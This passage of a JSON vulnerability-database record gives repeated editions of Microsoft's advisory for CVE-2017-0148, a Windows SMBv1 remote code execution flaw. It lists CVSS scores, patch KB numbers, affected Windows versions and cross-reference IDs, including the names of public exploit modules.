"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T08:55:45", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-04T08:55:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012217", "KB4012212", "KB4012214", "KB4012216", "KB3212646", "KBMS16-110, 3187754", "KB4013198", "KB3210720", "KB4012215", "KB3213986", "KB4013429", "KB3205409", "KB4012606", "KB4012598", "KB3177186", "KB3205401", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T08:55:45", "differentElements": ["msAffectedSoftware"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T14:46:24", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T14:46:24", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-04T14:46:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012215", "KB4012217", "KB4012606", "KB4012216", "KB4013429", "KBMS16-110, 3187754", 
"KB4012214", "KB4012213", "KB3210721", "KB3205401", "KB4012598", "KB3210720", "KB3213986", "KB3205409", "KB3212646", "KB4013198", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T14:46:24", "differentElements": ["msAffectedSoftware"], "edition": 9}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-04T16:51:19", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-04T16:51:19", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-04T16:51:19", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3205409", "KB3213986", "KB4013429", "KB4012213", "KB4012606", "KB4012215", "KBMS16-110, 3187754", "KB4012216", "KB4012212", "KB3210720", "KB3212646", "KB4012214", "KB3177186", "KB3210721", "KB4012217", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
